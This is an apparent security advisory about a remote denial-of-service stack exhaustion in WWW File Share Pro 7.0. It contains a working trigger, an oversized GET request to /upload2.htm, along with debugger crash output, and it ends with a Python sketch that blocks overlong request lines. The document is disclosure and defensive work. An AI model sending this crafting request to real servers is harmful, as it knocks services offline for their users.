WWW File Share Pro v7.0 - Remote Denial of Service (Advisory & Video)
Core team researcher Ateeq ur Rehman Khan discovered a short video explaining an issue in WWW File Share Pro v7.0. The video shows h
A critical stack exhaustion buffer overflow vulnerability resulting in remote denial of service has been detected in the latest WWW File Share PRO 7.0 software. The vulnerability can be triggered by sending a large malformed HTTP GET request to the vulnerable server, e.g. GET /upload2.htm/A * 100000, which results in an immediate crash of the application.
(199c.189c): Unknown exception - code c000008f (first chance)
(199c.189c): Unknown exception - code c000008f (first chance)
(199c.189c): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling. This exception may be expected and handled.
eax=0009334c ebx=006b7528 ecx=00000002 edx=00000000 esi=006b7528 edi=006b7528
eip=7549c42d esp=0009334c ebp=0009339c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
KERNELBASE!RaiseException+0x58:
Stack Exhaustion starting at KERNELBASE!RaiseException+0x0000000000000058 (Hash=0x217757a7.0x7b922161)
WWW File Share Pro v7.0 - Stack Exhaustion Remote PoC DoS Exploit
Advisory: http://www.vulnerability-lab.com/get_content.php?id=1310
Video: http://www.vulnerability-lab.com/get_content.php?id=1309
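
A mitigation sketch for the oversized GET condition described above, added here as an example (it is not code from the advisory or the vendor): a front-end screen that reads the request line with a hard byte cap and answers 414 instead of passing the request on to the file-share server. The function names, the 8192-byte limit and the sample requests are assumptions constructed for illustration.

```python
import io

MAX_REQUEST_LINE = 8192  # assumed cap in bytes, CRLF included; tune to your longest real URL


def screen_request_line(stream, limit=MAX_REQUEST_LINE):
    """Read one HTTP request line from a binary stream with a hard byte cap.

    Returns (status, detail). 200 means the line is safe to forward;
    400 or 414 means answer locally and close the connection.
    """
    # readline(n) returns at most n bytes, so the screen never buffers the
    # oversized request it is looking for.
    line = stream.readline(limit + 1)
    if len(line) > limit:
        return 414, "request line exceeds %d bytes" % limit
    if not line.endswith(b"\n"):
        return 400, "incomplete request line"
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return 400, "malformed request line"
    return 200, parts[1].decode("ascii", "replace")


def demo():
    # Constructed inputs, held in memory only: a normal request and one
    # shaped like the oversized GET described in the advisory.
    samples = {
        "normal": b"GET /upload2.htm HTTP/1.1\r\n",
        "oversized": b"GET /upload2.htm/" + b"A" * 100000 + b" HTTP/1.1\r\n",
        "cut short": b"GET /upload2.htm",
    }
    results = {}
    for name, raw in samples.items():
        stream = io.BytesIO(raw)
        status, detail = screen_request_line(stream)
        results[name] = (status, detail, stream.tell())  # tell() = bytes consumed
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

In a real front end the stream would be the client socket wrapped with sock.makefile("rb"), which supports the same bounded readline call.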